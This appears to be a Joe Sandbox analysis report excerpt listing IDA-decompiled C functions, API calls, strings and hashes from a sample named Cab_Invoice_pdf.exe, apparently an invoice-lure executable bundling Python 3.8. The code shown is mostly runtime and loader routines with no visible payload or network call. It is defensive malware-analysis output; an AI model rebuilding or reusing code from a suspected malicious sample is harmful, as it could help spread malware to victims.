                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 8d51565b6e71a9b63e906f92e2115f17098569f088477cda5a05da5642646419
                            • Instruction ID: d7d16b544a83020e4f203888848185fe598873af0cdd4b14f7f71a749fd32dbb
                            • Opcode Fuzzy Hash: 8d51565b6e71a9b63e906f92e2115f17098569f088477cda5a05da5642646419
                            • Instruction Fuzzy Hash: E9F030BA9012318BDA357F69F40284A3FE8E719B34B015A07F41566268CF762D458FC4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E0131F756(intOrPtr _a4) {
                            				signed int _v8;
                            				void* _v12;
                            				char _v16;
                            				intOrPtr* _t35;
                            				struct HINSTANCE__* _t36;
                            				struct HINSTANCE__* _t42;
                            				intOrPtr* _t43;
                            				intOrPtr* _t44;
                            				WCHAR* _t48;
                            				struct HINSTANCE__* _t49;
                            				struct HINSTANCE__* _t53;
                            				intOrPtr* _t56;
                            				struct HINSTANCE__* _t61;
                            				intOrPtr _t62;
                            
                            				if(_a4 == 2 || _a4 == 1) {
                            					GetModuleFileNameW(0, 0x1345eb0, 0x104);
                            					_t48 =  *0x1345e7c; // 0xe41c92
                            					 *0x1345e80 = 0x1345eb0;
                            					if(_t48 == 0 ||  *_t48 == 0) {
                            						_t48 = 0x1345eb0;
                            					}
                            					_v8 = 0;
                            					_v16 = 0;
                            					E0131F875(_t48, 0, 0,  &_v8,  &_v16);
                            					_t61 = E0131F9FB(_v8, _v16, 2);
                            					if(_t61 != 0) {
                            						E0131F875(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                            						if(_a4 != 1) {
                            							_v12 = 0;
                            							_push( &_v12);
                            							_t49 = E01327493(_t61);
                            							if(_t49 == 0) {
                            								_t56 = _v12;
                            								_t53 = 0;
                            								_t35 = _t56;
                            								if( *_t56 == 0) {
                            									L15:
                            									_t36 = 0;
                            									 *0x1345e6c = _t53;
                            									_v12 = 0;
                            									_t49 = 0;
                            									 *0x1345e74 = _t56;
                            									L16:
                            									E013209EB(_t36);
                            									_v12 = 0;
                            									goto L17;
                            								} else {
                            									goto L14;
                            								}
                            								do {
                            									L14:
                            									_t35 = _t35 + 4;
                            									_t53 =  &(_t53->i);
                            								} while ( *_t35 != 0);
                            								goto L15;
                            							}
                            							_t36 = _v12;
                            							goto L16;
                            						}
                            						 *0x1345e6c = _v8 - 1;
                            						_t42 = _t61;
                            						_t61 = 0;
                            						 *0x1345e74 = _t42;
                            						goto L10;
                            					} else {
                            						_t43 = E0131C9CE();
                            						_push(0xc);
                            						_pop(0);
                            						 *_t43 = 0;
                            						L10:
                            						_t49 = 0;
                            						L17:
                            						E013209EB(_t61);
                            						return _t49;
                            					}
                            				} else {
                            					_t44 = E0131C9CE();
                            					_t62 = 0x16;
                            					 *_t44 = _t62;
                            					E01321788();
                            					return _t62;
                            				}
                            			}


















                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Cab_Invoice_pdf.exe,00000104), ref: 0131F791
                            • _free.LIBCMT ref: 0131F85C
                            • _free.LIBCMT ref: 0131F866
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                            • API String ID: 2506810119-125003824
                            • Opcode ID: b9c86bf1d353686b29704739bb1349c729c68e19cdb06b7a28b8967f91f834ee
                            • Instruction ID: 5ec9d2aefa12972e1298bd1f9c83a26dea9c491dbc337891cb509af0698c1db8
                            • Opcode Fuzzy Hash: b9c86bf1d353686b29704739bb1349c729c68e19cdb06b7a28b8967f91f834ee
                            • Instruction Fuzzy Hash: B2318075E00229EFDB39DF9DD88099EBFFCEB85714B144166E90897204D6B09E45CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E0131F193(void* __ecx, char* _a4, char** _a8) {
                            				char* _v8;
                            				intOrPtr _v12;
                            				signed short* _v36;
                            				void* _t14;
                            				void* _t15;
                            				char** _t16;
                            				char* _t20;
                            				void* _t27;
                            				signed int* _t28;
                            				signed int* _t32;
                            				void* _t39;
                            				void* _t52;
                            				signed int _t57;
                            				signed short* _t58;
                            				intOrPtr _t59;
                            				char* _t61;
                            				char* _t62;
                            				signed int _t64;
                            				signed int* _t66;
                            				char* _t68;
                            				signed short* _t70;
                            
                            				_t39 = __ecx;
                            				_push(__ecx);
                            				_v8 = 0;
                            				_t14 = E01326CA2( &_v8, 0, L"TMP");
                            				if(_t14 == 0) {
                            					_t68 = _v8;
                            					_t61 = _t68;
                            					if(_t68 == 0) {
                            						goto L10;
                            					} else {
                            						_t20 = E01326D40(_t68, 0);
                            						if(_t20 != 0) {
                            							_push(_t61);
                            							L19();
                            							_t61 = _t20;
                            							if(_t61 == 0 || E01326D40(_t61, 0) != 0) {
                            								E013209EB(_t61);
                            								goto L10;
                            							} else {
                            								 *_a8 = _t61;
                            								E013209EB(0);
                            							}
                            						} else {
                            							_t68 = 0;
                            							 *_a8 = _t61;
                            						}
                            					}
                            					goto L17;
                            				} else {
                            					if(_t14 == 0x16) {
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						E01321798();
                            						asm("int3");
                            						_push(_t39);
                            						_push(0);
                            						_push(_t67);
                            						_t70 = _v36;
                            						_push(_t60);
                            						_t52 = 0;
                            						_t27 = 0;
                            						_t58 = _t70;
                            						_t64 =  *_t70 & 0x0000ffff;
                            						if(_t64 == 0) {
                            							L34:
                            							_t28 = 0;
                            						} else {
                            							_v12 = 0x22;
                            							do {
                            								if(_t64 == _v12) {
                            									_t52 = _t52 + 1;
                            								}
                            								_t58 =  &(_t58[1]);
                            								_t27 = _t27 + 1;
                            								_t64 =  *_t58 & 0x0000ffff;
                            							} while (_t64 != 0);
                            							if(_t52 == 0) {
                            								goto L34;
                            							} else {
                            								_t66 = E01320B10(_t52, _t27 - _t52 + 1, 2);
                            								if(_t66 != 0) {
                            									_t32 = _t66;
                            									if( *_t70 != 0) {
                            										_t59 = _v12;
                            										do {
                            											_t57 =  *_t70 & 0x0000ffff;
                            											if(_t57 != _t59) {
                            												 *_t32 = _t57;
                            												_t32 =  &(_t32[0]);
                            											}
                            											_t70 =  &(_t70[1]);
                            										} while ( *_t70 != 0);
                            									}
                            									 *_t32 = 0;
                            								} else {
                            									_t66 = 0;
                            								}
                            								E013209EB(0);
                            								_t28 = _t66;
                            							}
                            						}
                            						return _t28;
                            					} else {
                            						_t68 = 0;
                            						L10:
                            						_t62 = _a4;
                            						if(_t62 == 0 || E01326D40(_t62, 0) != 0) {
                            							_t62 = "\\";
                            							_t15 = E01326D40(_t62, 0);
                            							_t16 = _a8;
                            							if(_t15 == 0) {
                            								goto L13;
                            							} else {
                            								 *_t16 = ".";
                            							}
                            						} else {
                            							_t16 = _a8;
                            							L13:
                            							 *_t16 = _t62;
                            						}
                            						_t61 = 0;
                            						L17:
                            						E013209EB(_t68);
                            						return _t61;
                            					}
                            				}
                            			}

























                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID: TMP
                            • API String ID: 269201875-3125297090
                            • Opcode ID: eceb5b14c9a7f029e88d966b90cfc045e5d596b4cdbcd5e764fe61fe574d0d26
                            • Instruction ID: f3731e3e79587a18801af4c8c17b64d64b0237083e621961140dc6421baf6656
                            • Opcode Fuzzy Hash: eceb5b14c9a7f029e88d966b90cfc045e5d596b4cdbcd5e764fe61fe574d0d26
                            • Instruction Fuzzy Hash: 9321F6BE50461A6FE7197E5EAC818BF67ACEE8657C325001AFD049B244DA30DC0A4264
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyUnicode_ToNumeric.PYTHON38 ref: 6E2F25ED
                            • PyErr_SetString.PYTHON38(6E79ED94,not a numeric character), ref: 6E2F261A
                            • PyFloat_FromDouble.PYTHON38 ref: 6E2F2637
                            Strings
                            • not a numeric character, xrefs: 6E2F2613
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: DoubleErr_Float_FromNumericStringUnicode_
                            • String ID: not a numeric character
                            • API String ID: 727557307-2058156748
                            • Opcode ID: 2c50c3edb7d26abab23c1b3b2da7088b8bd964c1b9ccb286eac2ff2181106a69
                            • Instruction ID: 3c44254b5380eb4f99efb18979b2c5d910d81c01331e882abdbd203f869923f3
                            • Opcode Fuzzy Hash: 2c50c3edb7d26abab23c1b3b2da7088b8bd964c1b9ccb286eac2ff2181106a69
                            • Instruction Fuzzy Hash: E9016FB25A444ADBCB046F58EC49B55B7A9EF03217F0441E5EC4987211F722C527CBD6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 40%
                            			E013127A0(void* __edx, signed int _a8192, char* _a8200) {
                            				short _v0;
                            				signed int _t9;
                            				long _t12;
                            				signed int _t14;
                            				void* _t26;
                            				char* _t28;
                            				signed int _t32;
                            				signed int _t33;
                            
                            				_t26 = __edx;
                            				E01317880();
                            				_t9 =  *0x133c008; // 0xa212446c
                            				_a8192 = _t9 ^ _t32;
                            				_t28 = _a8200;
                            				_t12 = GetModuleFileNameW(0,  &_v0, 0x1000);
                            				_t39 = _t12;
                            				if(_t12 != 0) {
                            					_t14 = E01314C90(_t28,  &_v0, 0x1000);
                            					_t33 = _t32 + 0xc;
                            					__eflags = _t14;
                            					if(__eflags != 0) {
                            						__eflags = _a8192 ^ _t33;
                            						E0131786A();
                            						return 1;
                            					} else {
                            						_push("Failed to convert executable path to UTF-8.");
                            						E01311910(__eflags);
                            						__eflags = _a8192 ^ _t33 + 0x00000004;
                            						E0131786A();
                            						return 0;
                            					}
                            				} else {
                            					_push("Failed to get executable path.");
                            					_push("GetModuleFileNameW");
                            					E01311860(_t26, _t39);
                            					E0131786A();
                            					return 0;
                            				}
                            			}












                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,013124BA,?,?), ref: 013127CC
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            Strings
                            • Failed to get executable path., xrefs: 013127D6
                            • Failed to convert executable path to UTF-8., xrefs: 01312817
                            • GetModuleFileNameW, xrefs: 013127DB
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorFileLastModuleName
                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                            • API String ID: 2776309574-482168174
                            • Opcode ID: bef26021d22a708a7d6714b7cda39d973027c3753a1536e808d8574d1aafe37f
                            • Instruction ID: a205a57fdbf7f40491a2f4eb9c8ac3401cfe10d7a7d75353fa6430564aee038c
                            • Opcode Fuzzy Hash: bef26021d22a708a7d6714b7cda39d973027c3753a1536e808d8574d1aafe37f
                            • Instruction Fuzzy Hash: 4901D8717103056BF63CA739DC8BBEB76D9AF94708F840429FE09C228AF6649504C69B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E6E2F4FCE(void* __edi, void* __esi, intOrPtr* _a4) {
                            				intOrPtr* _t6;
                            				intOrPtr* _t8;
                            				intOrPtr* _t11;
                            
                            				_t8 = _a4;
                            				_t11 =  *_t8;
                            				if( *_t11 != 0xe06d7363 ||  *((intOrPtr*)(_t11 + 0x10)) != 3) {
                            					L6:
                            					return 0;
                            				} else {
                            					_t6 =  *((intOrPtr*)(_t11 + 0x14));
                            					if(_t6 == 0x19930520 || _t6 == 0x19930521 || _t6 == 0x19930522 || _t6 == 0x1994000) {
                            						L6E2F547E();
                            						 *_t6 = _t11;
                            						L6E2F5484();
                            						 *_t6 =  *((intOrPtr*)(_t8 + 4));
                            						L6E2F54E4();
                            						asm("int3");
                            						M6E3F8DAC = M6E3F8DAC & 0x00000000;
                            						return _t6;
                            					} else {
                            						goto L6;
                            					}
                            				}
                            			}

                            APIs
                            • __current_exception.VCRUNTIME140 ref: 6E2F500D
                            • __current_exception_context.VCRUNTIME140 ref: 6E2F5017
                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6E2F501E
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __current_exception__current_exception_contextterminate
                            • String ID: csm
                            • API String ID: 2542180945-1018135373
                            • Opcode ID: 5880b9dceeb19ffd75830669600669e63bb224754208947e0ad5e1cc624d21a0
                            • Instruction ID: 36f9eab3ca9cbaea67358444e53a45d40fc6f04b76923932c054c74a606071f2
                            • Opcode Fuzzy Hash: 5880b9dceeb19ffd75830669600669e63bb224754208947e0ad5e1cc624d21a0
                            • Instruction Fuzzy Hash: A5F082360C020FCBCB204EE5904054AF76EAE14B27751881AD4598BA10DBA0AD53CAE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E01324658(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				unsigned int _v20;
                            				signed int _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				char _v40;
                            				intOrPtr _v48;
                            				char _v52;
                            				void* __ebx;
                            				void* __edi;
                            				void* _t86;
                            				signed int _t92;
                            				signed int _t93;
                            				signed int _t94;
                            				signed int _t100;
                            				void* _t101;
                            				void* _t102;
                            				void* _t104;
                            				void* _t107;
                            				void* _t109;
                            				void* _t111;
                            				void* _t115;
                            				char* _t116;
                            				void* _t119;
                            				signed int _t121;
                            				signed int _t128;
                            				signed int* _t129;
                            				signed int _t136;
                            				signed int _t137;
                            				char _t138;
                            				signed int _t139;
                            				signed int _t142;
                            				signed int _t146;
                            				signed int _t151;
                            				char _t156;
                            				char _t157;
                            				void* _t161;
                            				unsigned int _t162;
                            				signed int _t164;
                            				signed int _t166;
                            				signed int _t170;
                            				void* _t171;
                            				signed int* _t172;
                            				signed int _t174;
                            				signed int _t181;
                            				signed int _t182;
                            				signed int _t183;
                            				signed int _t184;
                            				signed int _t185;
                            				signed int _t186;
                            				signed int _t187;
                            
                            				_t171 = __edx;
                            				_t181 = _a24;
                            				if(_t181 < 0) {
                            					_t181 = 0;
                            				}
                            				_t184 = _a8;
                            				 *_t184 = 0;
                            				E0131AFAE(0,  &_v52, _t171, _a36);
                            				_t5 = _t181 + 0xb; // 0xb
                            				if(_a12 > _t5) {
                            					_t172 = _a4;
                            					_t142 = _t172[1];
                            					_v36 =  *_t172;
                            					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                            					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                            						L11:
                            						__eflags = _t142 & 0x80000000;
                            						if((_t142 & 0x80000000) != 0) {
                            							 *_t184 = 0x2d;
                            							_t184 = _t184 + 1;
                            							__eflags = _t184;
                            						}
                            						__eflags = _a28;
                            						_v16 = 0x3ff;
                            						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                            						__eflags = _t172[1] & 0x7ff00000;
                            						_v32 = _t136;
                            						_t86 = 0x30;
                            						if((_t172[1] & 0x7ff00000) != 0) {
                            							 *_t184 = 0x31;
                            							_t185 = _t184 + 1;
                            							__eflags = _t185;
                            						} else {
                            							 *_t184 = _t86;
                            							_t185 = _t184 + 1;
                            							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                            							__eflags = _t164;
                            							if(_t164 != 0) {
                            								_v16 = 0x3fe;
                            							} else {
                            								_v16 = _v16 & _t164;
                            							}
                            						}
                            						_t146 = _t185;
                            						_t186 = _t185 + 1;
                            						_v28 = _t146;
                            						__eflags = _t181;
                            						if(_t181 != 0) {
                            							_t30 = _v48 + 0x88; // 0xffce8305
                            							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                            						} else {
                            							 *_t146 = 0;
                            						}
                            						_t92 = _t172[1] & 0x000fffff;
                            						__eflags = _t92;
                            						_v20 = _t92;
                            						if(_t92 > 0) {
                            							L23:
                            							_t33 =  &_v8;
                            							 *_t33 = _v8 & 0x00000000;
                            							__eflags =  *_t33;
                            							_t147 = 0xf0000;
                            							_t93 = 0x30;
                            							_v12 = _t93;
                            							_v20 = 0xf0000;
                            							do {
                            								__eflags = _t181;
                            								if(_t181 <= 0) {
                            									break;
                            								}
                            								_t119 = E0132F230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                            								_t161 = 0x30;
                            								_t121 = _t119 + _t161 & 0x0000ffff;
                            								__eflags = _t121 - 0x39;
                            								if(_t121 > 0x39) {
                            									_t121 = _t121 + _t136;
                            									__eflags = _t121;
                            								}
                            								_t162 = _v20;
                            								_t172 = _a4;
                            								 *_t186 = _t121;
                            								_t186 = _t186 + 1;
                            								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                            								_t147 = _t162 >> 4;
                            								_t93 = _v12 - 4;
                            								_t181 = _t181 - 1;
                            								_v20 = _t162 >> 4;
                            								_v12 = _t93;
                            								__eflags = _t93;
                            							} while (_t93 >= 0);
                            							__eflags = _t93;
                            							if(_t93 < 0) {
                            								goto L39;
                            							}
                            							_t115 = E0132F230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                            							__eflags = _t115 - 8;
                            							if(_t115 <= 8) {
                            								goto L39;
                            							}
                            							_t116 = _t186 - 1;
                            							_t138 = 0x30;
                            							while(1) {
                            								_t156 =  *_t116;
                            								__eflags = _t156 - 0x66;
                            								if(_t156 == 0x66) {
                            									goto L33;
                            								}
                            								__eflags = _t156 - 0x46;
                            								if(_t156 != 0x46) {
                            									_t139 = _v32;
                            									__eflags = _t116 - _v28;
                            									if(_t116 == _v28) {
                            										_t57 = _t116 - 1;
                            										 *_t57 =  *(_t116 - 1) + 1;
                            										__eflags =  *_t57;
                            									} else {
                            										_t157 =  *_t116;
                            										__eflags = _t157 - 0x39;
                            										if(_t157 != 0x39) {
                            											 *_t116 = _t157 + 1;
                            										} else {
                            											 *_t116 = _t139 + 0x3a;
                            										}
                            									}
                            									goto L39;
                            								}
                            								L33:
                            								 *_t116 = _t138;
                            								_t116 = _t116 - 1;
                            							}
                            						} else {
                            							__eflags =  *_t172;
                            							if( *_t172 <= 0) {
                            								L39:
                            								__eflags = _t181;
                            								if(_t181 > 0) {
                            									_push(_t181);
                            									_t111 = 0x30;
                            									_push(_t111);
                            									_push(_t186);
                            									E01318520(_t181);
                            									_t186 = _t186 + _t181;
                            									__eflags = _t186;
                            								}
                            								_t94 = _v28;
                            								__eflags =  *_t94;
                            								if( *_t94 == 0) {
                            									_t186 = _t94;
                            								}
                            								__eflags = _a28;
                            								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                            								_t174 = _a4[1];
                            								_t100 = E0132F230( *_a4, 0x34, _t174);
                            								_t137 = 0;
                            								_t151 = (_t100 & 0x000007ff) - _v16;
                            								__eflags = _t151;
                            								asm("sbb ebx, ebx");
                            								if(__eflags < 0) {
                            									L47:
                            									 *(_t186 + 1) = 0x2d;
                            									_t187 = _t186 + 2;
                            									__eflags = _t187;
                            									_t151 =  ~_t151;
                            									asm("adc ebx, 0x0");
                            									_t137 =  ~_t137;
                            									goto L48;
                            								} else {
                            									if(__eflags > 0) {
                            										L46:
                            										 *(_t186 + 1) = 0x2b;
                            										_t187 = _t186 + 2;
                            										L48:
                            										_t182 = _t187;
                            										_t101 = 0x30;
                            										 *_t187 = _t101;
                            										__eflags = _t137;
                            										if(__eflags < 0) {
                            											L56:
                            											__eflags = _t187 - _t182;
                            											if(_t187 != _t182) {
                            												L60:
                            												_push(0);
                            												_push(0xa);
                            												_push(_t137);
                            												_push(_t151);
                            												_t102 = E0132F150();
                            												_v32 = _t174;
                            												 *_t187 = _t102 + 0x30;
                            												_t187 = _t187 + 1;
                            												__eflags = _t187;
                            												L61:
                            												_t104 = 0x30;
                            												_t183 = 0;
                            												__eflags = 0;
                            												 *_t187 = _t151 + _t104;
                            												 *(_t187 + 1) = 0;
                            												goto L62;
                            											}
                            											__eflags = _t137;
                            											if(__eflags < 0) {
                            												goto L61;
                            											}
                            											if(__eflags > 0) {
                            												goto L60;
                            											}
                            											__eflags = _t151 - 0xa;
                            											if(_t151 < 0xa) {
                            												goto L61;
                            											}
                            											goto L60;
                            										}
                            										if(__eflags > 0) {
                            											L51:
                            											_push(0);
                            											_push(0x3e8);
                            											_push(_t137);
                            											_push(_t151);
                            											_t107 = E0132F150();
                            											_v32 = _t174;
                            											 *_t187 = _t107 + 0x30;
                            											_t187 = _t187 + 1;
                            											__eflags = _t187 - _t182;
                            											if(_t187 != _t182) {
                            												L55:
                            												_push(0);
                            												_push(0x64);
                            												_push(_t137);
                            												_push(_t151);
                            												_t109 = E0132F150();
                            												_v32 = _t174;
                            												 *_t187 = _t109 + 0x30;
                            												_t187 = _t187 + 1;
                            												__eflags = _t187;
                            												goto L56;
                            											}
                            											L52:
                            											__eflags = _t137;
                            											if(__eflags < 0) {
                            												goto L56;
                            											}
                            											if(__eflags > 0) {
                            												goto L55;
                            											}
                            											__eflags = _t151 - 0x64;
                            											if(_t151 < 0x64) {
                            												goto L56;
                            											}
                            											goto L55;
                            										}
                            										__eflags = _t151 - 0x3e8;
                            										if(_t151 < 0x3e8) {
                            											goto L52;
                            										}
                            										goto L51;
                            									}
                            									__eflags = _t151;
                            									if(_t151 < 0) {
                            										goto L47;
                            									}
                            									goto L46;
                            								}
                            							}
                            							goto L23;
                            						}
                            					}
                            					__eflags = 0;
                            					if(0 != 0) {
                            						goto L11;
                            					} else {
                            						_t183 = E0132495B(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                            						__eflags = _t183;
                            						if(_t183 == 0) {
                            							_t128 = E013187B0(_t184, 0x65);
                            							_pop(_t166);
                            							__eflags = _t128;
                            							if(_t128 != 0) {
                            								__eflags = _a28;
                            								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                            								__eflags = _t170;
                            								 *_t128 = _t170;
                            								 *((char*)(_t128 + 3)) = 0;
                            							}
                            							_t183 = 0;
                            						} else {
                            							 *_t184 = 0;
                            						}
                            						goto L62;
                            					}
                            				} else {
                            					_t129 = E0131C9CE();
                            					_t183 = 0x22;
                            					 *_t129 = _t183;
                            					E01321788();
                            					L62:
                            					if(_v40 != 0) {
                            						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                            					}
                            					return _t183;
                            				}
                            			}
                            0x013246d7
                            0x013246e3
                            0x013246e9
                            0x013246ea
                            0x013246ec
                            0x013246ee
                            0x013246f9
                            0x013246f9
                            0x013246fc
                            0x013246fe
                            0x013246fe
                            0x01324701
                            0x013246d9
                            0x013246d9
                            0x013246d9
                            0x00000000
                            0x013246d7
                            0x01324686
                            0x01324686
                            0x0132468d
                            0x0132468e
                            0x01324690
                            0x01324942
                            0x01324946
                            0x0132494b
                            0x0132494b
                            0x0132495a
                            0x0132495a

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction ID: 37408c50be862385cf85ac23bfa52516f9be958e5176de40648c675eb74b8eca
                            • Opcode Fuzzy Hash: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction Fuzzy Hash: A3A19A72E103A69FE722EF2CC8907AEBFE5EF52318F18416DD6A59B381C2758941C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E6E2F3E00(intOrPtr _a4, char* _a8, intOrPtr _a12, signed int* _a16, intOrPtr _a20) {
                            				char _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				int _t54;
                            				int _t55;
                            				signed int _t58;
                            				signed int _t59;
                            				void* _t61;
                            				signed int _t67;
                            				void* _t68;
                            				signed int _t75;
                            				unsigned int _t79;
                            				intOrPtr _t101;
                            				signed int _t102;
                            				signed int _t103;
                            				signed int _t109;
                            				signed int _t110;
